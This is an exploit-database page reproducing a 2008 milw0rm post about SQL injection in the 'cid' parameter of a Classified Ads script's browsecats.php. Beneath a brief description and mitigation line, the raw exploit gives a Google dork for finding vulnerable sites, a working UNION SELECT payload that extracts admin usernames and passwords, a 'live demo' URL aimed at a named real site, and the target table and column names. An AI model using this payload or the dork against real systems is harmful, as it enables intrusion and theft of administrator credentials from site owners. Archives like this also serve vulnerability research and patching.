Classified Ads (cid) Remote SQL Injection Vulnerability

vendor:

Classified Ads (cid)

by:

Hussin X

CVSS

HIGH

SQL Injection

CWE

Product Name: Classified Ads (cid)

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Classified Ads (cid) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in the Classified Ads (cid) script. An attacker can exploit this vulnerability to gain access to sensitive information such as admin credentials. The vulnerability is due to insufficient sanitization of user-supplied input to the 'cid' parameter in the 'browsecats.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. This can allow the attacker to gain access to sensitive information such as admin credentials.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

|___________________________________________________|
|
| Classified Ads (cid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  www.tryag.cc/cc
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|___________________________________________________
|                                                   |
|
| script : http://www.pozscripts.com/product_details.php?category_id=0&item_id=5
|
| DorK   : inurl:browsecats.php?cid=
|___________________________________________________|






Exploit:  

www.[target].com/Script/browsecats.php?cid=-32+union+select+1,concat_ws(0x3a,admin_name,pwd),3,4,5+from+bbxbzauctions_admin--




L!VE DEMO:


http://www.bbx.com/bbxca/browsecats.php?cid=-32+union+select+1,concat_ws(0x3a,admin_name,pwd),3,4,5+from+bbxbzauctions_admin--


________________________
table_name : column_name

bbxbzauctions_admin:admin_name
bbxbzauctions_admin:pwd
freetplbanners_admin:admin_name
freetplbanners_admin:pwd

________________________




____________________________( Greetz )____________________________
|
| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
|   
| Iraqihack | FAHD | mos_chori | Silic0n 
|
|_________________________________________________________________


                       Im IRAQi

# milw0rm.com [2008-07-30]